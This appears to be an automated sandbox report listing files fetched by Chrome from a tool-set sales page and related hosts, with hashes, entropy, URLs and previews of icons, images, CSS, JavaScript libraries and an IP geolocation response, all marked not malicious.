                                                                                        Preview:<svg width="17" height="12" viewBox="0 0 17 12" fill="none" xmlns="http://www.w3.org/2000/svg">..<path d="M15.135 0.758545H1.53153C0.869721 0.758545 0.333252 1.29501 0.333252 1.95683V10.0431C0.333252 10.7049 0.869721 11.2414 1.53153 11.2414H15.135C15.7968 11.2414 16.3333 10.7049 16.3333 10.0431V1.95683C16.3333 1.29501 15.7968 0.758545 15.135 0.758545Z" fill="#41479B"/>..<path d="M0.609127 5.99992H1.08831L3.64363 4.32573V5.99992H5.02294V4.32573L7.57822 5.99992H8.05741C8.20975 5.99992 8.33328 5.87639 8.33328 5.72404V5.50523L6.14094 4.06889H8.33325V2.68958H6.14091L8.33325 1.25323V1.03442C8.33325 0.882045 8.20972 0.758545 8.05738 0.758545H7.57819L5.02288 2.43273V0.758545H3.64356V2.43273L1.17213 0.813482C0.883564 0.904107 0.642314 1.10108 0.493658 1.35829L2.52563 2.68958H0.333252V4.06889H2.5256L0.333252 5.50523V5.72404C0.333252 5.87639 0.456721 5.99992 0.609127 5.99992Z" fill="#F5F5F5"/>..<path d="M8.33325 2.96545H4.74703V0.758545H3.91947V2.96545H0.333252V3.79301H3.91947V5.99992H4.74703V3.7
                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                        File Type:SVG Scalable Vector Graphics image
                                                                                        Category:downloaded
                                                                                        Size (bytes):723
                                                                                        Entropy (8bit):5.11829814568569
                                                                                        Encrypted:false
                                                                                        SSDEEP:
                                                                                        MD5:A1138502A0299D9A33E19DC29FE44913
                                                                                        SHA1:EB4ED4D1E8E6F43980FD40E5E260C001878B3E6A
                                                                                        SHA-256:3AB561420773E3EF5C830BFC4448F388B552BB9A91A63A2EC18A77944B54A07B
                                                                                        SHA-512:767D3416DEE6BE05963DA7B3664AABA35109564F88F76FC0EE82DFEB5E030EBB79776898ED6DE7676AE14C178B505E435FB1186209A748E9D3C48CBF87312814
                                                                                        Malicious:false
                                                                                        Reputation:unknown
                                                                                        URL:https://www.ibisworld.com/resources/img/flags/menu-flag-it.svg
                                                                                        Preview:<svg width="17" height="17" viewBox="0 0 17 17" fill="none" xmlns="http://www.w3.org/2000/svg">..<g clip-path="url(#clip0_1356_17013)">..<path d="M5.51303 13.4015H0.455563C0.303219 13.4015 0.179688 13.278 0.179688 13.1256V3.19458C0.179688 3.04223 0.303219 2.9187 0.455563 2.9187H5.51303V13.4015Z" fill="#73AF00"/>..<path d="M10.8461 2.9187H5.5127V13.4015H10.8461V2.9187Z" fill="#F5F5F5"/>..<path d="M15.9037 13.4015H10.8462V2.9187H15.9037C16.056 2.9187 16.1795 3.04223 16.1795 3.19458V13.1256C16.1795 13.278 16.056 13.4015 15.9037 13.4015Z" fill="#FF4B55"/>..</g>..<defs>..<clipPath id="clip0_1356_17013">..<rect width="16" height="16" fill="white" transform="translate(0.179688 0.160156)"/>..</clipPath>..</defs>..</svg>..
                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                        File Type:RIFF (little-endian) data, Web/P image
                                                                                        Category:downloaded
                                                                                        Size (bytes):3224
                                                                                        Entropy (8bit):7.910405852407167
                                                                                        Encrypted:false
                                                                                        SSDEEP:
                                                                                        MD5:CE03D41BA648EA776DA074AAEFE127D1
                                                                                        SHA1:A749C5F1398A396A9D2A1FF69DB42D3DB8E5CC54
                                                                                        SHA-256:200F718005FFC05FB53555035904963A28BD174E1D53316052349DC4AAF4B0F7
                                                                                        SHA-512:4CE40D3B07B83B89460273C8A20E6576BD52A5F6BF3FFA66FC738C6C615C78E642DD5F044D8FABCDE427D959C642B387630A6479ECA15C4EBF897115C14AE81C
                                                                                        Malicious:false
                                                                                        Reputation:unknown
                                                                                        URL:https://cdn4image.com/creatives/670/346/192_5_1710858046374.webp
                                                                                        Preview:RIFF....WEBPVP8X..............ALPH$........!9..x5;.m.m...m_t..w..v....zw.?.........D.......I...W..O{T......(.p..f...Jh..E...=.@i}.^.._B..|;oh.l.A.......(.....HGI.17...........B...`.1..z....}...<...3.vJ}..(.'mD.o..h.r...V"....S.N.grp5.........J0.y.m.s.... .}.t...U).6.R1....<....A&#...../.IA...Jb......%....^...w..:>..q.......y..r%..Z......v2....A..&..A.....J%./...{...(+.1..5m...eL..P.])....y.:..H ......l...y.4#............<.r.E>.._y.K.|..H...W[PB..<E<.....n(%wb.Q6..3UL.w.\.v......w...Q..^TQ...+E+....dy.#..d.n./....G%.S...[2..\_3.[.#u|.....n..9.....t..2..}J..........a..8'.e.z.yyr?..7.........(.R:...%..d.s.tl.a6.X.C.....e.E.P.ps......iL~as.......,..........6.NN....*=..K.3..Np..fsq..&.~bs....<..1......t&k.l.^..h...HM...f...0h.e.....&.QR.?.Lm..W1....+Je?..^$...~/2.j..J../..R......G...t.4.....4....r...G^.......Q......Y>...Nf.v.Cz&FS..wy...."@k..p..{..|...Q >\i%.....ha n...U.i..0}..*1@k).....w9M.(..nJ...*Q\~ .u.C.)......&`..0E.,UE.+....d ..
                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                        File Type:ASCII text, with very long lines (23059), with CRLF line terminators
                                                                                        Category:downloaded
                                                                                        Size (bytes):169369
                                                                                        Entropy (8bit):5.109653161650404
                                                                                        Encrypted:false
                                                                                        SSDEEP:
                                                                                        MD5:1967191A40F96E29E71DAF3F0F2DC108
                                                                                        SHA1:91257DB80767C527870C5E35BD803CB5E569591E
                                                                                        SHA-256:D45498261FA5B53BFE1075F0A0244B711DEDCC998387952C08F8E8AC7C2B2244
                                                                                        SHA-512:DAB2FA61CB676F78C5BBD6026C673698F8FDF732A12A74E46DD62FB4ABE53FDBB7553F4C8322BC8408C759ED028911300A1AE878C978C5DF2203FBB6BA18ADDB
                                                                                        Malicious:false
                                                                                        Reputation:unknown
                                                                                        URL:https://www.ibisworld.com/resources/js/materialize.override.min.js
                                                                                        Preview:/*!.. * Materialize v0.97.8 (http://materializecss.com).. * Copyright 2014-2015 Materialize.. * MIT License (https://raw.githubusercontent.com/Dogfalo/materialize/master/LICENSE).. */..try {.. if ("undefined" == typeof jQuery) { var jQuery; jQuery = "function" == typeof require ? $ = require("jquery") : $ } jQuery.easing.jswing = jQuery.easing.swing, jQuery.extend(jQuery.easing, { def: "easeOutQuad", swing: function (a, b, c, d, e) { return jQuery.easing[jQuery.easing.def](a, b, c, d, e) }, easeInQuad: function (a, b, c, d, e) { return d * (b /= e) * b + c }, easeOutQuad: function (a, b, c, d, e) { return -d * (b /= e) * (b - 2) + c }, easeInOutQuad: function (a, b, c, d, e) { return (b /= e / 2) < 1 ? d / 2 * b * b + c : -d / 2 * (--b * (b - 2) - 1) + c }, easeInCubic: function (a, b, c, d, e) { return d * (b /= e) * b * b + c }, easeOutCubic: function (a, b, c, d, e) { return d * ((b = b / e - 1) * b * b + 1) + c }, easeInOutCubic: function (a, b, c, d, e) { return (b /= e / 2) <
                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                        File Type:ASCII text, with very long lines (32110), with CRLF line terminators
                                                                                        Category:downloaded
                                                                                        Size (bytes):245074
                                                                                        Entropy (8bit):5.294513923407559
                                                                                        Encrypted:false
                                                                                        SSDEEP:
                                                                                        MD5:E7A7C3C66BA4F45437A4F16442F4A721
                                                                                        SHA1:D5C8047346319A0A7BF0388CC3B90320106E9018
                                                                                        SHA-256:43E189F3AE3C4681344938D88CE74D95E2E59B835B5278F634F94538A7414C16
                                                                                        SHA-512:183FDF01EC1AC54BD35835A5A5938EAEF73C1E8115B67A12F4B4565482E82176686D8A54506B71C9623287CD850FCFE504B825322776B6859FDF26346BCDAB0B
                                                                                        Malicious:false
                                                                                        Reputation:unknown
                                                                                        URL:https://www.electronixmaster.com/a/dewalt-tool-set/v1/assets/dist/codebase.min.js
                                                                                        Preview:!function(t){function e(){}function n(t,e){return function(){t.apply(e,arguments)}}function o(t){if("object"!=typeof this)throw new TypeError("Promises must be constructed via new");if("function"!=typeof t)throw new TypeError("not a function");this._state=0,this._handled=!1,this._value=void 0,this._deferreds=[],s(t,this)}function r(t,e){for(;3===t._state;)t=t._value;return 0===t._state?void t._deferreds.push(e):(t._handled=!0,void a(function(){var n=1===t._state?e.onFulfilled:e.onRejected;if(null===n)return void(1===t._state?i:f)(e.promise,t._value);var o;try{o=n(t._value)}catch(r){return void f(e.promise,r)}i(e.promise,o)}))}function i(t,e){try{if(e===t)throw new TypeError("A promise cannot be resolved with itself.");if(e&&("object"==typeof e||"function"==typeof e)){var r=e.then;if(e instanceof o)return t._state=3,t._value=e,void u(t);if("function"==typeof r)return void s(n(r,e),t)}t._state=1,t._value=e,u(t)}catch(i){f(t,i)}}function f(t,e){t._state=2,t._value=e,u(t)}function u(t){2==
                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                        File Type:SVG Scalable Vector Graphics image
                                                                                        Category:dropped
                                                                                        Size (bytes):1151
                                                                                        Entropy (8bit):4.709598438663401
                                                                                        Encrypted:false
                                                                                        SSDEEP:
                                                                                        MD5:4739519FFB1CF2529A1E6DB439EB5EA4
                                                                                        SHA1:644DA7610ECD7139E8E058ACC4C8660A21C87D8E
                                                                                        SHA-256:F3504E5FB76DF1E442D0AE090B03C48057A482FEC70C141E2515AC3C1C3FBCF0
                                                                                        SHA-512:A1B2E326F99271764ED5D924B7B2FA0830EEC9D47986DBD8545BD2E63091A2A83305FEA87F4CD4A3D6609291FEDBAF74E394C26D346E220D0AAB62E8D11621F4
                                                                                        Malicious:false
                                                                                        Reputation:unknown
                                                                                        Preview:<svg width="17" height="12" viewBox="0 0 17 12" fill="none" xmlns="http://www.w3.org/2000/svg">..<path d="M0.39917 1.56492H16.2673C16.105 1.09564 15.6595 0.758545 15.135 0.758545H1.53155C1.00704 0.758545 0.561576 1.09564 0.39917 1.56492Z" fill="#FF4B55"/>..<path d="M16.3333 3.98389H0.333252V4.79023H16.3333V3.98389Z" fill="#FF4B55"/>..<path d="M16.3333 2.37109H0.333252V3.17744H16.3333V2.37109Z" fill="#FF4B55"/>..<path d="M0.333252 6.12718C0.333252 6.27952 0.456783 6.40305 0.609127 6.40305H16.3333V5.59668H0.333252V6.12718Z" fill="#FF4B55"/>..<path d="M16.3333 8.82251H0.333252V9.62888H16.3333V8.82251Z" fill="#FF4B55"/>..<path d="M16.2674 10.4348H0.39917C0.561576 10.9041 1.00708 11.2412 1.53154 11.2412H15.135C15.6595 11.2412 16.1049 10.9041 16.2674 10.4348Z" fill="#FF4B55"/>..<path d="M16.3333 7.20972H0.333252V8.01606H16.3333V7.20972Z" fill="#FF4B55"/>..<path d="M0.609127 6.40314H7.50569C7.65803 6.40314 7.78156 6.27961 7.78156 6.12726V1.03442C7.78156 0.882045 7.65803 0.758545 7.50569 0.758
                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                        File Type:ASCII text
                                                                                        Category:downloaded
                                                                                        Size (bytes):21068
                                                                                        Entropy (8bit):4.91821460341314
                                                                                        Encrypted:false
                                                                                        SSDEEP:
                                                                                        MD5:30EE118577642ABA8FE9B49E09AFA3E4
                                                                                        SHA1:2BB7FFE8F19FA63BFBE466B713C7A2B965CC3886
                                                                                        SHA-256:ED8D20A27AE37DDD88B879EE659FE2626081415E8ED27611A7F99CEAEAE4DE6D
                                                                                        SHA-512:F00B452E76296BDD67DEF5DE7D027AD2612CCD34BE5087D674AD2F3F5DB53B4A778ECCAB7196810FA7855A21FE008410A039AA28180B62F14704A0E769C2D024
                                                                                        Malicious:false
                                                                                        Reputation:unknown
                                                                                        URL:https://www.electronixmaster.com/a/dewalt-tool-set/v1/app/desktop/css02/index.css
                                                                                        Preview:* {. margin: 0;. padding: 0;.}..no-gutter {. padding: 0;.}..clearfix {. clear: both;.}.p.no-margin {. margin-top: 0 !important;.}.p.no-padding {. padding-top: 0 !important;.}.a {. text-decoration: none;. color: #999;.}.a:hover {. text-decoration: none;. color: #999;.}..headerbox {. background: #FFF;. margin: 0px auto 20px auto;. padding: 0 0 0 0;. -moz-border-radius: 0 0 5px 5px;. -webkit-border-radius: 0 0 5px 5px;. -khtml-border-radius: 0 0 5px 5px;. border-radius: 0 0 5px 5px;. box-shadow: 0 0 4px #333;. -webkit-box-shadow: 0 0 4px #333;. -moz-box-shadow: 0 0 4px #333;.}..headerbox h1 {. text-align: center;. margin: 15px;. padding: 0;. font-size: 28px;.}..btn-danger {. color: #fff;. text-align: center;. background-color: #FF9900;. border-color: #ff6600;.}..btn-danger:hover {. color: #fff;. background-color: #ff6600;. border-color: #ff6600;.}..btn-danger {. background-image: -webkit-linear
                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                        File Type:ASCII text, with very long lines (65326)
                                                                                        Category:downloaded
                                                                                        Size (bytes):160302
                                                                                        Entropy (8bit):5.078105585474276
                                                                                        Encrypted:false
                                                                                        SSDEEP:
                                                                                        MD5:816AF0EDDD3B4822C2756227C7E7B7EE
                                                                                        SHA1:C470239D4C7DB36D56DC3A74A080C62218C6EDC4
                                                                                        SHA-256:5B0FBE5B7AD705F6A937C4998AD02F73D8F0D976FE231B74AEF0EC996990C93A
                                                                                        SHA-512:32844D968C5B4AD05C0FCCF733FD819A74FEAE0E08B0CC4F917686876CC3E8B18D34513CD16DE89EC02145C30032B4A8C962FDC43EC4AEDD267A7EEF47C2D466
                                                                                        Malicious:false
                                                                                        Reputation:unknown
                                                                                        URL:https://www.electronixmaster.com/a/dewalt-tool-set/v1/app/desktop/css02/bootstrap.min.css
                                                                                        Preview:/*!. * Bootstrap v4.5.2 (https://getbootstrap.com/). * Copyright 2011-2020 The Bootstrap Authors. * Copyright 2011-2020 Twitter, Inc.. * Licensed under MIT (https://github.com/twbs/bootstrap/blob/main/LICENSE). */:root{--blue:#007bff;--indigo:#6610f2;--purple:#6f42c1;--pink:#e83e8c;--red:#dc3545;--orange:#fd7e14;--yellow:#ffc107;--green:#28a745;--teal:#20c997;--cyan:#17a2b8;--white:#fff;--gray:#6c757d;--gray-dark:#343a40;--primary:#007bff;--secondary:#6c757d;--success:#28a745;--info:#17a2b8;--warning:#ffc107;--danger:#dc3545;--light:#f8f9fa;--dark:#343a40;--breakpoint-xs:0;--breakpoint-sm:576px;--breakpoint-md:768px;--breakpoint-lg:992px;--breakpoint-xl:1200px;--font-family-sans-serif:-apple-system,BlinkMacSystemFont,"Segoe UI",Roboto,"Helvetica Neue",Arial,"Noto Sans",sans-serif,"Apple Color Emoji","Segoe UI Emoji","Segoe UI Symbol","Noto Color Emoji";--font-family-monospace:SFMono-Regular,Menlo,Monaco,Consolas,"Liberation Mono","Courier New",monospace}*,::after,::before{box-sizing:bo
                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                        File Type:RIFF (little-endian) data, Web/P image
                                                                                        Category:downloaded
                                                                                        Size (bytes):6410
                                                                                        Entropy (8bit):7.965860373936693
                                                                                        Encrypted:false
                                                                                        SSDEEP:
                                                                                        MD5:E25B8DA902B9DEE2B8021903500BD861
                                                                                        SHA1:2474CF261A306991C3F5735D27D8E0C102D955C4
                                                                                        SHA-256:19EA4538DE964AABC4060FC06F7C99E65BBF85F66974D7FC612DD5A5F6F51E3E
                                                                                        SHA-512:22843F2C250A42D3024C5777F533B029FF272AE91BF7E0A020E9AAFA534A9955EECC6D546F5168792490421385A1694E6913127611476C107669C98519619366
                                                                                        Malicious:false
                                                                                        Reputation:unknown
                                                                                        URL:https://cdn4image.com/creatives/670/346/192_3_1710858046374.webp
                                                                                        Preview:RIFF....WEBPVP8X..............ALPHO.....@.j...../.!. .q.PqwW...........q...T......F..........O1... ..W...I$p..L......_.s.x..U.p..'..I.*....$.DQ.Z..v....V.d..IR.......F".l.@..{....)+.$..d...!0P.2P.6...=.l.A..3. .{...MZP...z]..;w.."..$j..Y./g.'C2.../.......h....D.2$.T.....S..0..p.G.....I....m.H6A..^C.Te(]zr.]....9.i..k...J].....H.`..2.!}~..d...n...R...mU%..H....iJ....!..H.._..!m..c.. . -w....T>.Q.....5...,|yz. .D..mP......{..t8w.5...C.$.....X..~...%.....5d u.#]....#.z.l.~..i#.O...YI...jI.....!;..+.&...e.V...H..q?..V._.J.B:=......R ....d.b.%......2d3..W+.'.nn`.j..'RjR.2d7..*..*.53d9.........l.O........2..q{)..<QC.w..RA..d...._..@..K4XP.......'....;JID......R@.5.`E.{t..'uS...k%N:.o6E.5.d..{.K2.....2./v.$A..1..?.HP...4XS'.'..O.9.." 1.k...8.=..T.U.(..H..K....f}IH...Q...@".}gj..~.S. ...Q.b.$...'5.'...\.,..P...h..G+.....&..K.*.....E...........@N\l..7.."m.&MC=.X}...6./.....\...S.ZGy...(........e...&v(.d..:.O.9*B. i.]:P.....C.S.b.......w.G..>.L..
                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                        File Type:PNG image data, 1000 x 1000, 8-bit colormap, non-interlaced
                                                                                        Category:downloaded
                                                                                        Size (bytes):191023
                                                                                        Entropy (8bit):7.989024924176345
                                                                                        Encrypted:false
                                                                                        SSDEEP:
                                                                                        MD5:1D98C9AF75BC3104C8D39FFFFF44CECA
                                                                                        SHA1:2915D8789872A4322411D9E42FE069365AD18789
                                                                                        SHA-256:92D05B7571953F80DE695C166833965850F73A9EF16F0C87F79409C791795135
                                                                                        SHA-512:6C4FC9AFE09AA39C03AFF334B575EA64BDE44E25A16ABA1F591B0C2E6F2D495A0F00DB1076CE75BB7BF4C57A1D33116336E79828E550ED1465EFBDAD8BD644AF
                                                                                        Malicious:false
                                                                                        Reputation:unknown
                                                                                        URL:https://qwartiqpin.online/uploads/archive/product/561/images/p561-3.png
                                                                                        Preview:.PNG........IHDR.............z}$.....gAMA......a.....sRGB........cPLTEGpL......<=>.....xyzvts.........GHI...$$&678223CB?,-._^_.....PPQ...............=%....nVA.*.`...dg@jK....tRNS....0L..z. ..A.. .IDATx..r...EOY..!..1U....z.%.....I2...8.1...~.........................................................................................................................y9.s...,..i.v.g.-}....7..w...JQ.....G...0.8g...>.{..._.7..u>.g.'H/.0N)....D.....R. u....v....UV.....%*.B/L../....#X.K...{.x...cxD..oPr.u}...ae.F!..<k:..1...!.L..v19.m..nS....A+......#q....R..ezYV......u..2......7.u.2..D/*Qi.H...Vw..@T.T.5;...& ..k..<.].2.....a.S.KG&*w.e..NI..*.|...0c......'..q......7........].i.y62.j..X.2&.....7.q."O".E+y+D.x..Z..../...j.R...R..Q.M{..S...M..<.7..N..0..s..H?+..ZW..c*.QN.d.I.....:.6.w....|R....w..|K..W..C}...Gkt.[h.IZM7.t..rc..."J.@4S..8...s..C|...B....;..b.oW..R...fX..k.......4...B...o.l.<-.,....iT..Pu..!kf;.q.O.#.Lj.C..K*....r..>;n.'..e..z..J4...y.Z.[./.ZW
                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                        File Type:ASCII text
                                                                                        Category:downloaded
                                                                                        Size (bytes):537
                                                                                        Entropy (8bit):5.098042234638776
                                                                                        Encrypted:false
                                                                                        SSDEEP:
                                                                                        MD5:B02EE59974166C94D76C8C9221404FC7
                                                                                        SHA1:82986B15A54F0261CF3CA41B5AC6AD447F6ED4AE
                                                                                        SHA-256:A66B6585930A7532D753F4663B3DCA3FCE47D8616E9C83C6F765D577EBB0D084
                                                                                        SHA-512:577CB0ADE0BD4DE30829A60B6011B54DFEB9B322E566CE6293C75645C8DA0F22135AF00BE1D93192DC96D85F7F0A658C13D0721309D710C045B9A3F332B27C5E
                                                                                        Malicious:false
                                                                                        Reputation:unknown
                                                                                        URL:https://ipinfo.io/json?token=91cdacfab10633&callback=jQuery37004357921852284321_1715107282009&_=1715107282010
                                                                                        Preview:/**/ typeof jQuery37004357921852284321_1715107282009 === 'function' && jQuery37004357921852284321_1715107282009({. "ip": "156.146.37.102",. "hostname": "unn-156-146-37-102.cdn77.com",. "city": "New York City",. "region": "New York",. "country": "US",. "loc": "40.7143,-74.0060",. "org": "AS212238 Datacamp Limited",. "postal": "10001",. "timezone": "America/New_York",. "asn": {. "asn": "AS212238",. "name": "Datacamp Limited",. "domain": "datacamp.co.uk",. "route": "156.146.37.0/24",. "type": "hosting". }.});
                                                                                        No static file info